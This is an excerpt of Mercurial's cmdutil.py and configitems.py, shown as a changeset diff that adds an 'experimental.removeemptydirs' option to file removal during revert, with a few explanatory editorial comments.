    edittext.extend([hgprefix(_("subrepo %s") % s) for s in subs])
    edittext.extend([hgprefix(_("added %s") % f) for f in added])
    edittext.extend([hgprefix(_("changed %s") % f) for f in modified])
    edittext.extend([hgprefix(_("removed %s") % f) for f in removed])
    if not added and not modified and not removed:
        edittext.append(hgprefix(_("no files changed")))
    edittext.append("")

    return "\n".join(edittext)

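# --- editorial note, not part of cmdutil.py ----------------------------------
# A typical editor buffer produced by buildcommittext, with illustrative
# values; line order follows the appends above (added before changed/removed):
#
#   HG: Enter commit message. Lines beginning with 'HG:' are removed.
#   HG: Leave message empty to abort commit.
#   HG: --
#   HG: user: Alice <alice@example.com>
#   HG: branch 'default'
#   HG: added bar.py
#   HG: changed foo.py
# ------------------------------------------------------------------------------
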
def commitstatus(repo, node, branch, bheads=None, opts=None):
    if opts is None:
        opts = {}
    ctx = repo[node]
    parents = ctx.parents()

    if (not opts.get('amend') and bheads and node not in bheads and not
        [x for x in parents if x.node() in bheads and x.branch() == branch]):
        repo.ui.status(_('created new head\n'))
        # The message is not printed for initial roots. For the other
        # changesets, it is printed in the following situations:
        #
        # Par column: for the 2 parents with ...
        #   N: null or no parent
        #   B: parent is on another named branch
        #   C: parent is a regular non head changeset
        #   H: parent was a branch head of the current branch
        # Msg column: whether we print "created new head" message
        # In the following, it is assumed that there already exists some
        # initial branch heads of the current branch, otherwise nothing is
        # printed anyway.
        #
        # Par Msg Comment
        # N N  y  additional topo root
        #
        # B N  y  additional branch root
        # C N  y  additional topo head
        # H N  n  usual case
        #
        # B B  y  weird additional branch root
        # C B  y  branch merge
        # H B  n  merge with named branch
        #
        # C C  y  additional head from merge
        # C H  n  merge with a head
        #
        # H H  n  head merge: head count decreases

    if not opts.get('close_branch'):
        for r in parents:
            if r.closesbranch() and r.branch() == branch:
                repo.ui.status(_('reopening closed branch head %d\n') % r.rev())

    if repo.ui.debugflag:
        repo.ui.write(_('committed changeset %d:%s\n') % (ctx.rev(), ctx.hex()))
    elif repo.ui.verbose:
        repo.ui.write(_('committed changeset %d:%s\n') % (ctx.rev(), ctx))

def postcommitstatus(repo, pats, opts):
    return repo.status(match=scmutil.match(repo[None], pats, opts))

def revert(ui, repo, ctx, parents, *pats, **opts):
    opts = pycompat.byteskwargs(opts)
    parent, p2 = parents
    node = ctx.node()

    mf = ctx.manifest()
    if node == p2:
        parent = p2

    # need all matching names in dirstate and manifest of target rev,
    # so have to walk both. do not print errors if files exist in one
    # but not other. in both cases, filesets should be evaluated against
    # workingctx to get consistent result (issue4497). this means 'set:**'
    # cannot be used to select missing files from target rev.

    # `names` is a mapping for all elements in working copy and target revision
    # The mapping is in the form:
    # <abs path in repo> -> (<path from CWD>, <exactly specified by matcher?>)
    names = {}

    with repo.wlock():
        ## filling of the `names` mapping
        # walk dirstate to fill `names`

        interactive = opts.get('interactive', False)
        wctx = repo[None]
        m = scmutil.match(wctx, pats, opts)

        # we'll need this later
        targetsubs = sorted(s for s in wctx.substate if m(s))

        if not m.always():
            matcher = matchmod.badmatch(m, lambda x, y: False)
            for abs in wctx.walk(matcher):
                names[abs] = m.rel(abs), m.exact(abs)

            # walk target manifest to fill `names`

            def badfn(path, msg):
                if path in names:
                    return
                if path in ctx.substate:
                    return
                path_ = path + '/'
                for f in names:
                    if f.startswith(path_):
                        return
                ui.warn("%s: %s\n" % (m.rel(path), msg))

            for abs in ctx.walk(matchmod.badmatch(m, badfn)):
                if abs not in names:
                    names[abs] = m.rel(abs), m.exact(abs)

            # Find the status of all files in `names`.
            m = scmutil.matchfiles(repo, names)

            changes = repo.status(node1=node, match=m,
                                  unknown=True, ignored=True, clean=True)
        else:
            changes = repo.status(node1=node, match=m)
            for kind in changes:
                for abs in kind:
                    names[abs] = m.rel(abs), m.exact(abs)

            m = scmutil.matchfiles(repo, names)

        modified = set(changes.modified)
        added = set(changes.added)
        removed = set(changes.removed)
        _deleted = set(changes.deleted)
        unknown = set(changes.unknown)
        unknown.update(changes.ignored)
        clean = set(changes.clean)
        modadded = set()

        # We need to account for the state of the file in the dirstate,
        # even when we revert against something other than the parent. This
        # will slightly alter the behavior of revert (doing back up or not,
        # delete or just forget etc).
        if parent == node:
            dsmodified = modified
            dsadded = added
            dsremoved = removed
            # store all local modifications, useful later for rename detection
            localchanges = dsmodified | dsadded
            modified, added, removed = set(), set(), set()
        else:
            changes = repo.status(node1=parent, match=m)
            dsmodified = set(changes.modified)
            dsadded = set(changes.added)
            dsremoved = set(changes.removed)
            # store all local modifications, useful later for rename detection
            localchanges = dsmodified | dsadded

            # only take into account removes between wc and target
            clean |= dsremoved - removed
            dsremoved &= removed
            # distinguish between dirstate removes and the others
            removed -= dsremoved

            modadded = added & dsmodified
            added -= modadded

            # tell newly modified apart.
            dsmodified &= modified
            dsmodified |= modified & dsadded # dirstate added may need backup
            modified -= dsmodified

            # We need to wait for some post-processing to update this set
            # before making the distinction. The dirstate will be used for
            # that purpose.
            dsadded = added

        # in case of merge, files that are actually added can be reported as
        # modified, we need to post process the result
        if p2 != nullid:
            mergeadd = set(dsmodified)
            for path in dsmodified:
                if path in mf:
                    mergeadd.remove(path)
            dsadded |= mergeadd
            dsmodified -= mergeadd

        # if f is a rename, update `names` to also revert the source
        cwd = repo.getcwd()
        for f in localchanges:
            src = repo.dirstate.copied(f)
            # XXX should we check for rename down to target node?
            if src and src not in names and repo.dirstate[src] == 'r':
                dsremoved.add(src)
                names[src] = (repo.pathto(src, cwd), True)

        # determine the exact nature of the deleted files
        deladded = set(_deleted)
        for path in _deleted:
            if path in mf:
                deladded.remove(path)
        deleted = _deleted - deladded

        # distinguish between files to forget and the others
        added = set()
        for abs in dsadded:
            if repo.dirstate[abs] != 'a':
                added.add(abs)
        dsadded -= added

        for abs in deladded:
            if repo.dirstate[abs] == 'a':
                dsadded.add(abs)
        deladded -= dsadded

        # For files marked as removed, we check if an unknown file is present
        # at the same path. If such a file exists it may need to be backed up.
        # Making the distinction at this stage helps have simpler backup
        # logic.
        removunk = set()
        for abs in removed:
            target = repo.wjoin(abs)
            if os.path.lexists(target):
                removunk.add(abs)
        removed -= removunk

        dsremovunk = set()
        for abs in dsremoved:
            target = repo.wjoin(abs)
            if os.path.lexists(target):
                dsremovunk.add(abs)
        dsremoved -= dsremovunk

        # actions to be actually performed by revert
        # (<list of files>, <message>) tuple
        actions = {'revert': ([], _('reverting %s\n')),
                   'add': ([], _('adding %s\n')),
                   'remove': ([], _('removing %s\n')),
                   'drop': ([], _('removing %s\n')),
                   'forget': ([], _('forgetting %s\n')),
                   'undelete': ([], _('undeleting %s\n')),
                   'noop': (None, _('no changes needed to %s\n')),
                   'unknown': (None, _('file not managed: %s\n')),
                  }

        # "constants" that convey the backup strategy.
        # All set to `discard` if `no-backup` is set, to avoid checking
        # no_backup lower in the code.
        # These values are ordered for comparison purposes
        backupinteractive = 3 # do backup if interactively modified
        backup = 2  # unconditionally do backup
        check = 1   # check if the existing file differs from target
        discard = 0 # never do backup
        if opts.get('no_backup'):
            backupinteractive = backup = check = discard
        if interactive:
            dsmodifiedbackup = backupinteractive
        else:
            dsmodifiedbackup = backup
        tobackup = set()

        backupanddel = actions['remove']
        if not opts.get('no_backup'):
            backupanddel = actions['drop']

        disptable = (
            # dispatch table:
            #   file state
            #   action
            #   make backup

            ## Sets whose contents will result in files changing on disk
            # Modified compared to target, no local change
            (modified,      actions['revert'],   discard),
            # Modified compared to target, but local file is deleted
            (deleted,       actions['revert'],   discard),
            # Modified compared to target, local change
            (dsmodified,    actions['revert'],   dsmodifiedbackup),
            # Added since target
            (added,         actions['remove'],   discard),
            # Added in working directory
            (dsadded,       actions['forget'],   discard),
            # Added since target, have local modification
            (modadded,      backupanddel,        backup),
            # Added since target but file is missing in working directory
            (deladded,      actions['drop'],     discard),
            # Removed since target, before working copy parent
            (removed,       actions['add'],      discard),
            # Same as `removed` but an unknown file exists at the same path
            (removunk,      actions['add'],      check),
            # Removed since target, marked as such in working copy parent
            (dsremoved,     actions['undelete'], discard),
            # Same as `dsremoved` but an unknown file exists at the same path
            (dsremovunk,    actions['undelete'], check),
            ## the following sets do not result in any file changes
            # File with no modification
            (clean,         actions['noop'],     discard),
            # Existing file, not tracked anywhere
            (unknown,       actions['unknown'],  discard),
            )

        for abs, (rel, exact) in sorted(names.items()):
            # target file to be touched on disk (relative to cwd)
            target = repo.wjoin(abs)
            # search the entry in the dispatch table.
            # if the file is in any of these sets, it was touched in the working
            # directory parent and we are sure it needs to be reverted.
            for table, (xlist, msg), dobackup in disptable:
                if abs not in table:
                    continue
                if xlist is not None:
                    xlist.append(abs)
                    if dobackup:
                        # If in interactive mode, don't automatically create
                        # .orig files (issue4793)
                        if dobackup == backupinteractive:
                            tobackup.add(abs)
                        elif (backup <= dobackup or wctx[abs].cmp(ctx[abs])):
                            bakname = scmutil.origpath(ui, repo, rel)
                            ui.note(_('saving current version of %s as %s\n') %
                                    (rel, bakname))
                            if not opts.get('dry_run'):
                                if interactive:
                                    util.copyfile(target, bakname)
                                else:
                                    util.rename(target, bakname)
                    if ui.verbose or not exact:
                        if not isinstance(msg, bytes):
                            msg = msg(abs)
                        ui.status(msg % rel)
                elif exact:
                    ui.warn(msg % rel)
                break

        if not opts.get('dry_run'):
            needdata = ('revert', 'add', 'undelete')
            oplist = [actions[name][0] for name in needdata]
            prefetch = scmutil.prefetchfiles
            matchfiles = scmutil.matchfiles
            prefetch(repo, [ctx.rev()],
                     matchfiles(repo,
                                [f for sublist in oplist for f in sublist]))
            _performrevert(repo, parents, ctx, actions, interactive, tobackup)

        if targetsubs:
            # Revert the subrepos on the revert list
            for sub in targetsubs:
                try:
                    wctx.sub(sub).revert(ctx.substate[sub], *pats,
                                         **pycompat.strkwargs(opts))
                except KeyError:
                    raise error.Abort("subrepository '%s' does not exist in %s!"
                                      % (sub, short(ctx.node())))

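# --- editorial sketch, not part of cmdutil.py --------------------------------
# The backup levels in revert() are ordered ints so one comparison decides. A
# hedged standalone restatement of the dobackup branch above (helper name and
# argument shape are illustrative):
def _needsbackup(dobackup, filediffers, interactive,
                 backupinteractive=3, backup=2):
    if not dobackup:                                 # discard == 0
        return False
    if interactive and dobackup == backupinteractive:
        return True   # deferred: backed up per selected hunk later
    # `backup` always copies; `check` (1) only when the file differs from
    # the revert target.
    return backup <= dobackup or filediffers
# ------------------------------------------------------------------------------
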
def _performrevert(repo, parents, ctx, actions, interactive=False,
                   tobackup=None):
    """function that actually performs all the actions computed for revert

    This is an independent function to let extensions plug in and react to
    the imminent revert.

    Make sure you have the working directory locked when calling this function.
    """
    parent, p2 = parents
    node = ctx.node()
    excluded_files = []

    def checkout(f):
        fc = ctx[f]
        repo.wwrite(f, fc.data(), fc.flags())

    def doremove(f):
        try:
-            repo.wvfs.unlinkpath(f)
+            rmdir = repo.ui.configbool('experimental', 'removeemptydirs')
+            repo.wvfs.unlinkpath(f, rmdir=rmdir)
        except OSError:
            pass
        repo.dirstate.remove(f)

    audit_path = pathutil.pathauditor(repo.root, cached=True)
    for f in actions['forget'][0]:
        if interactive:
            choice = repo.ui.promptchoice(
                _("forget added file %s (Yn)?$$ &Yes $$ &No") % f)
            if choice == 0:
                repo.dirstate.drop(f)
            else:
                excluded_files.append(f)
        else:
            repo.dirstate.drop(f)
    for f in actions['remove'][0]:
        audit_path(f)
        if interactive:
            choice = repo.ui.promptchoice(
                _("remove added file %s (Yn)?$$ &Yes $$ &No") % f)
            if choice == 0:
                doremove(f)
            else:
                excluded_files.append(f)
        else:
            doremove(f)
    for f in actions['drop'][0]:
        audit_path(f)
        repo.dirstate.remove(f)

    normal = None
    if node == parent:
        # We're reverting to our parent. If possible, we'd like status
        # to report the file as clean. We have to use normallookup for
        # merges to avoid losing information about merged/dirty files.
        if p2 != nullid:
            normal = repo.dirstate.normallookup
        else:
            normal = repo.dirstate.normal

    newlyaddedandmodifiedfiles = set()
    if interactive:
        # Prompt the user for changes to revert
        torevert = [f for f in actions['revert'][0] if f not in excluded_files]
        m = scmutil.matchfiles(repo, torevert)
        diffopts = patch.difffeatureopts(repo.ui, whitespace=True)
        diffopts.nodates = True
        diffopts.git = True
        operation = 'discard'
        reversehunks = True
        if node != parent:
            operation = 'apply'
            reversehunks = False
        if reversehunks:
            diff = patch.diff(repo, ctx.node(), None, m, opts=diffopts)
        else:
            diff = patch.diff(repo, None, ctx.node(), m, opts=diffopts)
        originalchunks = patch.parsepatch(diff)

        try:

            chunks, opts = recordfilter(repo.ui, originalchunks,
                                        operation=operation)
            if reversehunks:
                chunks = patch.reversehunks(chunks)

        except error.PatchError as err:
            raise error.Abort(_('error parsing patch: %s') % err)

        newlyaddedandmodifiedfiles = newandmodified(chunks, originalchunks)
        if tobackup is None:
            tobackup = set()
        # Apply changes
        fp = stringio()
        for c in chunks:
            # Create a backup file only if this hunk should be backed up
            if ishunk(c) and c.header.filename() in tobackup:
                abs = c.header.filename()
                target = repo.wjoin(abs)
                bakname = scmutil.origpath(repo.ui, repo, m.rel(abs))
                util.copyfile(target, bakname)
                tobackup.remove(abs)
            c.write(fp)
        dopatch = fp.tell()
        fp.seek(0)
        if dopatch:
            try:
                patch.internalpatch(repo.ui, repo, fp, 1, eolmode=None)
            except error.PatchError as err:
                raise error.Abort(pycompat.bytestr(err))
        del fp
    else:
        for f in actions['revert'][0]:
            checkout(f)
            if normal:
                normal(f)

    for f in actions['add'][0]:
        # Don't checkout modified files, they are already created by the diff
        if f not in newlyaddedandmodifiedfiles:
            checkout(f)
            repo.dirstate.add(f)

    normal = repo.dirstate.normallookup
    if node == parent and p2 == nullid:
        normal = repo.dirstate.normal
    for f in actions['undelete'][0]:
        checkout(f)
        normal(f)

    copied = copies.pathcopies(repo[parent], ctx)

    for f in actions['add'][0] + actions['undelete'][0] + actions['revert'][0]:
        if f in copied:
            repo.dirstate.copy(copied[f], f)

3152
3149 # a list of (ui, repo, otherpeer, opts, missing) functions called by
3153 # a list of (ui, repo, otherpeer, opts, missing) functions called by
3150 # commands.outgoing. "missing" is "missing" of the result of
3154 # commands.outgoing. "missing" is "missing" of the result of
3151 # "findcommonoutgoing()"
3155 # "findcommonoutgoing()"
3152 outgoinghooks = util.hooks()
3156 outgoinghooks = util.hooks()
3153
3157
3154 # a list of (ui, repo) functions called by commands.summary
3158 # a list of (ui, repo) functions called by commands.summary
3155 summaryhooks = util.hooks()
3159 summaryhooks = util.hooks()
3156
3160
3157 # a list of (ui, repo, opts, changes) functions called by commands.summary.
3161 # a list of (ui, repo, opts, changes) functions called by commands.summary.
3158 #
3162 #
3159 # functions should return tuple of booleans below, if 'changes' is None:
3163 # functions should return tuple of booleans below, if 'changes' is None:
3160 # (whether-incomings-are-needed, whether-outgoings-are-needed)
3164 # (whether-incomings-are-needed, whether-outgoings-are-needed)
3161 #
3165 #
3162 # otherwise, 'changes' is a tuple of tuples below:
3166 # otherwise, 'changes' is a tuple of tuples below:
3163 # - (sourceurl, sourcebranch, sourcepeer, incoming)
3167 # - (sourceurl, sourcebranch, sourcepeer, incoming)
3164 # - (desturl, destbranch, destpeer, outgoing)
3168 # - (desturl, destbranch, destpeer, outgoing)
3165 summaryremotehooks = util.hooks()
3169 summaryremotehooks = util.hooks()
3166
3170
3167 # A list of state files kept by multistep operations like graft.
3171 # A list of state files kept by multistep operations like graft.
3168 # Since graft cannot be aborted, it is considered 'clearable' by update.
3172 # Since graft cannot be aborted, it is considered 'clearable' by update.
3169 # note: bisect is intentionally excluded
3173 # note: bisect is intentionally excluded
3170 # (state file, clearable, allowcommit, error, hint)
3174 # (state file, clearable, allowcommit, error, hint)
3171 unfinishedstates = [
3175 unfinishedstates = [
3172 ('graftstate', True, False, _('graft in progress'),
3176 ('graftstate', True, False, _('graft in progress'),
3173 _("use 'hg graft --continue' or 'hg graft --stop' to stop")),
3177 _("use 'hg graft --continue' or 'hg graft --stop' to stop")),
3174 ('updatestate', True, False, _('last update was interrupted'),
3178 ('updatestate', True, False, _('last update was interrupted'),
3175 _("use 'hg update' to get a consistent checkout"))
3179 _("use 'hg update' to get a consistent checkout"))
3176 ]
3180 ]
3177
3181
3178 def checkunfinished(repo, commit=False):
3182 def checkunfinished(repo, commit=False):
3179 '''Look for an unfinished multistep operation, like graft, and abort
3183 '''Look for an unfinished multistep operation, like graft, and abort
3180 if found. It's probably good to check this right before
3184 if found. It's probably good to check this right before
3181 bailifchanged().
3185 bailifchanged().
3182 '''
3186 '''
3183 # Check for non-clearable states first, so things like rebase will take
3187 # Check for non-clearable states first, so things like rebase will take
3184 # precedence over update.
3188 # precedence over update.
3185 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3189 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3186 if clearable or (commit and allowcommit):
3190 if clearable or (commit and allowcommit):
3187 continue
3191 continue
3188 if repo.vfs.exists(f):
3192 if repo.vfs.exists(f):
3189 raise error.Abort(msg, hint=hint)
3193 raise error.Abort(msg, hint=hint)
3190
3194
3191 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3195 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3192 if not clearable or (commit and allowcommit):
3196 if not clearable or (commit and allowcommit):
3193 continue
3197 continue
3194 if repo.vfs.exists(f):
3198 if repo.vfs.exists(f):
3195 raise error.Abort(msg, hint=hint)
3199 raise error.Abort(msg, hint=hint)
3196
3200
3197 def clearunfinished(repo):
3201 def clearunfinished(repo):
3198 '''Check for unfinished operations (as above), and clear the ones
3202 '''Check for unfinished operations (as above), and clear the ones
3199 that are clearable.
3203 that are clearable.
3200 '''
3204 '''
3201 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3205 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3202 if not clearable and repo.vfs.exists(f):
3206 if not clearable and repo.vfs.exists(f):
3203 raise error.Abort(msg, hint=hint)
3207 raise error.Abort(msg, hint=hint)
3204 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3208 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3205 if clearable and repo.vfs.exists(f):
3209 if clearable and repo.vfs.exists(f):
3206 util.unlink(repo.vfs.join(f))
3210 util.unlink(repo.vfs.join(f))
3207
3211
3208 afterresolvedstates = [
3212 afterresolvedstates = [
3209 ('graftstate',
3213 ('graftstate',
3210 _('hg graft --continue')),
3214 _('hg graft --continue')),
3211 ]
3215 ]
3212
3216
3213 def howtocontinue(repo):
3217 def howtocontinue(repo):
3214 '''Check for an unfinished operation and return the command to finish
3218 '''Check for an unfinished operation and return the command to finish
3215 it.
3219 it.
3216
3220
3217 afterresolvedstates tuples define a .hg/{file} and the corresponding
3221 afterresolvedstates tuples define a .hg/{file} and the corresponding
3218 command needed to finish it.
3222 command needed to finish it.
3219
3223
3220 Returns a (msg, warning) tuple. 'msg' is a string and 'warning' is
3224 Returns a (msg, warning) tuple. 'msg' is a string and 'warning' is
3221 a boolean.
3225 a boolean.
3222 '''
3226 '''
3223 contmsg = _("continue: %s")
3227 contmsg = _("continue: %s")
3224 for f, msg in afterresolvedstates:
3228 for f, msg in afterresolvedstates:
3225 if repo.vfs.exists(f):
3229 if repo.vfs.exists(f):
3226 return contmsg % msg, True
3230 return contmsg % msg, True
3227 if repo[None].dirty(missing=True, merge=False, branch=False):
3231 if repo[None].dirty(missing=True, merge=False, branch=False):
3228 return contmsg % _("hg commit"), False
3232 return contmsg % _("hg commit"), False
3229 return None, None
3233 return None, None
3230
3234
3231 def checkafterresolved(repo):
3235 def checkafterresolved(repo):
3232 '''Inform the user about the next action after completing hg resolve
3236 '''Inform the user about the next action after completing hg resolve
3233
3237
3234 If there's a matching afterresolvedstates, howtocontinue will yield
3238 If there's a matching afterresolvedstates, howtocontinue will yield
3235 repo.ui.warn as the reporter.
3239 repo.ui.warn as the reporter.
3236
3240
3237 Otherwise, it will yield repo.ui.note.
3241 Otherwise, it will yield repo.ui.note.
3238 '''
3242 '''
3239 msg, warning = howtocontinue(repo)
3243 msg, warning = howtocontinue(repo)
3240 if msg is not None:
3244 if msg is not None:
3241 if warning:
3245 if warning:
3242 repo.ui.warn("%s\n" % msg)
3246 repo.ui.warn("%s\n" % msg)
3243 else:
3247 else:
3244 repo.ui.note("%s\n" % msg)
3248 repo.ui.note("%s\n" % msg)
3245
3249
3246 def wrongtooltocontinue(repo, task):
3250 def wrongtooltocontinue(repo, task):
3247 '''Raise an abort suggesting how to properly continue if there is an
3251 '''Raise an abort suggesting how to properly continue if there is an
3248 active task.
3252 active task.
3249
3253
3250 Uses howtocontinue() to find the active task.
3254 Uses howtocontinue() to find the active task.
3251
3255
3252 If there's no task (repo.ui.note for 'hg commit'), it does not offer
3256 If there's no task (repo.ui.note for 'hg commit'), it does not offer
3253 a hint.
3257 a hint.
3254 '''
3258 '''
3255 after = howtocontinue(repo)
3259 after = howtocontinue(repo)
3256 hint = None
3260 hint = None
3257 if after[1]:
3261 if after[1]:
3258 hint = after[0]
3262 hint = after[0]
3259 raise error.Abort(_('no %s in progress') % task, hint=hint)
3263 raise error.Abort(_('no %s in progress') % task, hint=hint)
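
# --- editorial sketch, not part of cmdutil.py --------------------------------
# Typical caller pattern for the unfinished-state helpers above: guard a
# command body before it touches the working copy (command name illustrative):
def _mycommand(ui, repo):
    checkunfinished(repo)   # abort if e.g. a graft is still in progress
    bailifchanged(repo)     # abort on uncommitted local changes
    # ... proceed; on a dirty exit, howtocontinue()/checkafterresolved()
    # supply the "continue: ..." hint shown to the user.
# ------------------------------------------------------------------------------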
@@ -1,1352 +1,1355 b''
# configitems.py - centralized declaration of configuration option
#
# Copyright 2017 Pierre-Yves David <pierre-yves.david@octobus.net>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import absolute_import

import functools
import re

from . import (
    encoding,
    error,
)

def loadconfigtable(ui, extname, configtable):
    """update config items known to the ui with the extension ones"""
    for section, items in sorted(configtable.items()):
        knownitems = ui._knownconfig.setdefault(section, itemregister())
        knownkeys = set(knownitems)
        newkeys = set(items)
        for key in sorted(knownkeys & newkeys):
            msg = "extension '%s' overwrite config item '%s.%s'"
            msg %= (extname, section, key)
            ui.develwarn(msg, config='warn-config')

        knownitems.update(items)

class configitem(object):
    """represent a known config item

    :section: the official config section where to find this item,
    :name: the official name within the section,
    :default: default value for this item,
    :alias: optional list of tuples as alternatives,
    :generic: this is a generic definition, match name using regular expression.
    """

    def __init__(self, section, name, default=None, alias=(),
                 generic=False, priority=0):
        self.section = section
        self.name = name
        self.default = default
        self.alias = list(alias)
        self.generic = generic
        self.priority = priority
        self._re = None
        if generic:
            self._re = re.compile(self.name)

class itemregister(dict):
    """A specialized dictionary that can handle wild-card selection"""

    def __init__(self):
        super(itemregister, self).__init__()
        self._generics = set()

    def update(self, other):
        super(itemregister, self).update(other)
        self._generics.update(other._generics)

    def __setitem__(self, key, item):
        super(itemregister, self).__setitem__(key, item)
        if item.generic:
            self._generics.add(item)

    def get(self, key):
        baseitem = super(itemregister, self).get(key)
        if baseitem is not None and not baseitem.generic:
            return baseitem

        # search for a matching generic item
        generics = sorted(self._generics, key=(lambda x: (x.priority, x.name)))
        for item in generics:
            # we use 'match' instead of 'search' to make the matching simpler
            # for people unfamiliar with regular expressions. Having the match
            # rooted at the start of the string will produce less surprising
            # results for users writing simple regexes for sub-attributes.
            #
            # For example using "color\..*" match produces an unsurprising
            # result, while using search could suddenly match apparently
            # unrelated configuration that happens to contain "color."
            # anywhere. This is a tradeoff where we favor requiring ".*" on
            # some matches to avoid the need to prefix most patterns with "^".
            # The "^" seems more error prone.
            if item._re.match(key):
                return item

        return None

coreitems = {}

def _register(configtable, *args, **kwargs):
    item = configitem(*args, **kwargs)
    section = configtable.setdefault(item.section, itemregister())
    if item.name in section:
        msg = "duplicated config item registration for '%s.%s'"
        raise error.ProgrammingError(msg % (item.section, item.name))
    section[item.name] = item

# special value for case where the default is derived from other values
dynamicdefault = object()

# Registering actual config items

def getitemregister(configtable):
    f = functools.partial(_register, configtable)
    # export pseudo enum as configitem.*
    f.dynamicdefault = dynamicdefault
    return f

coreconfigitem = getitemregister(coreitems)

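# --- editorial sketch, not part of configitems.py ----------------------------
# Extensions register their own items through the same machinery via
# mercurial.registrar; a hedged example declaring a boolean knob like the one
# exercised by the tests in this changeset (core itself registers it with
# coreconfigitem; the default shown is an assumption matching the tests):
#
#   from mercurial import registrar
#   configtable = {}
#   configitem = registrar.configitem(configtable)
#   configitem('experimental', 'removeemptydirs',
#       default=True,
#   )
#
# Readers then consult it through ui, e.g.:
#   rmdir = repo.ui.configbool('experimental', 'removeemptydirs')
# ------------------------------------------------------------------------------
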
coreconfigitem('alias', '.*',
    default=dynamicdefault,
    generic=True,
)
coreconfigitem('annotate', 'nodates',
    default=False,
)
coreconfigitem('annotate', 'showfunc',
    default=False,
)
coreconfigitem('annotate', 'unified',
    default=None,
)
coreconfigitem('annotate', 'git',
    default=False,
)
coreconfigitem('annotate', 'ignorews',
    default=False,
)
coreconfigitem('annotate', 'ignorewsamount',
    default=False,
)
coreconfigitem('annotate', 'ignoreblanklines',
    default=False,
)
coreconfigitem('annotate', 'ignorewseol',
    default=False,
)
coreconfigitem('annotate', 'nobinary',
    default=False,
)
coreconfigitem('annotate', 'noprefix',
    default=False,
)
coreconfigitem('auth', 'cookiefile',
    default=None,
)
# bookmarks.pushing: internal hack for discovery
coreconfigitem('bookmarks', 'pushing',
    default=list,
)
# bundle.mainreporoot: internal hack for bundlerepo
coreconfigitem('bundle', 'mainreporoot',
    default='',
)
# bundle.reorder: experimental config
coreconfigitem('bundle', 'reorder',
    default='auto',
)
coreconfigitem('censor', 'policy',
    default='abort',
)
coreconfigitem('chgserver', 'idletimeout',
    default=3600,
)
coreconfigitem('chgserver', 'skiphash',
    default=False,
)
coreconfigitem('cmdserver', 'log',
    default=None,
)
coreconfigitem('color', '.*',
    default=None,
    generic=True,
)
coreconfigitem('color', 'mode',
    default='auto',
)
coreconfigitem('color', 'pagermode',
    default=dynamicdefault,
)
coreconfigitem('commands', 'show.aliasprefix',
    default=list,
)
coreconfigitem('commands', 'status.relative',
    default=False,
)
193 coreconfigitem('commands', 'status.skipstates',
193 coreconfigitem('commands', 'status.skipstates',
194 default=[],
194 default=[],
195 )
195 )
196 coreconfigitem('commands', 'status.terse',
196 coreconfigitem('commands', 'status.terse',
197 default='',
197 default='',
198 )
198 )
199 coreconfigitem('commands', 'status.verbose',
199 coreconfigitem('commands', 'status.verbose',
200 default=False,
200 default=False,
201 )
201 )
202 coreconfigitem('commands', 'update.check',
202 coreconfigitem('commands', 'update.check',
203 default=None,
203 default=None,
204 )
204 )
205 coreconfigitem('commands', 'update.requiredest',
205 coreconfigitem('commands', 'update.requiredest',
206 default=False,
206 default=False,
207 )
207 )
208 coreconfigitem('committemplate', '.*',
208 coreconfigitem('committemplate', '.*',
209 default=None,
209 default=None,
210 generic=True,
210 generic=True,
211 )
211 )
212 coreconfigitem('convert', 'cvsps.cache',
212 coreconfigitem('convert', 'cvsps.cache',
213 default=True,
213 default=True,
214 )
214 )
215 coreconfigitem('convert', 'cvsps.fuzz',
215 coreconfigitem('convert', 'cvsps.fuzz',
216 default=60,
216 default=60,
217 )
217 )
218 coreconfigitem('convert', 'cvsps.logencoding',
218 coreconfigitem('convert', 'cvsps.logencoding',
219 default=None,
219 default=None,
220 )
220 )
221 coreconfigitem('convert', 'cvsps.mergefrom',
221 coreconfigitem('convert', 'cvsps.mergefrom',
222 default=None,
222 default=None,
223 )
223 )
224 coreconfigitem('convert', 'cvsps.mergeto',
224 coreconfigitem('convert', 'cvsps.mergeto',
225 default=None,
225 default=None,
226 )
226 )
227 coreconfigitem('convert', 'git.committeractions',
227 coreconfigitem('convert', 'git.committeractions',
228 default=lambda: ['messagedifferent'],
228 default=lambda: ['messagedifferent'],
229 )
229 )
230 coreconfigitem('convert', 'git.extrakeys',
230 coreconfigitem('convert', 'git.extrakeys',
231 default=list,
231 default=list,
232 )
232 )
233 coreconfigitem('convert', 'git.findcopiesharder',
233 coreconfigitem('convert', 'git.findcopiesharder',
234 default=False,
234 default=False,
235 )
235 )
236 coreconfigitem('convert', 'git.remoteprefix',
236 coreconfigitem('convert', 'git.remoteprefix',
237 default='remote',
237 default='remote',
238 )
238 )
239 coreconfigitem('convert', 'git.renamelimit',
239 coreconfigitem('convert', 'git.renamelimit',
240 default=400,
240 default=400,
241 )
241 )
242 coreconfigitem('convert', 'git.saverev',
242 coreconfigitem('convert', 'git.saverev',
243 default=True,
243 default=True,
244 )
244 )
245 coreconfigitem('convert', 'git.similarity',
245 coreconfigitem('convert', 'git.similarity',
246 default=50,
246 default=50,
247 )
247 )
248 coreconfigitem('convert', 'git.skipsubmodules',
248 coreconfigitem('convert', 'git.skipsubmodules',
249 default=False,
249 default=False,
250 )
250 )
251 coreconfigitem('convert', 'hg.clonebranches',
251 coreconfigitem('convert', 'hg.clonebranches',
252 default=False,
252 default=False,
253 )
253 )
254 coreconfigitem('convert', 'hg.ignoreerrors',
254 coreconfigitem('convert', 'hg.ignoreerrors',
255 default=False,
255 default=False,
256 )
256 )
257 coreconfigitem('convert', 'hg.revs',
257 coreconfigitem('convert', 'hg.revs',
258 default=None,
258 default=None,
259 )
259 )
260 coreconfigitem('convert', 'hg.saverev',
260 coreconfigitem('convert', 'hg.saverev',
261 default=False,
261 default=False,
262 )
262 )
263 coreconfigitem('convert', 'hg.sourcename',
263 coreconfigitem('convert', 'hg.sourcename',
264 default=None,
264 default=None,
265 )
265 )
266 coreconfigitem('convert', 'hg.startrev',
266 coreconfigitem('convert', 'hg.startrev',
267 default=None,
267 default=None,
268 )
268 )
269 coreconfigitem('convert', 'hg.tagsbranch',
269 coreconfigitem('convert', 'hg.tagsbranch',
270 default='default',
270 default='default',
271 )
271 )
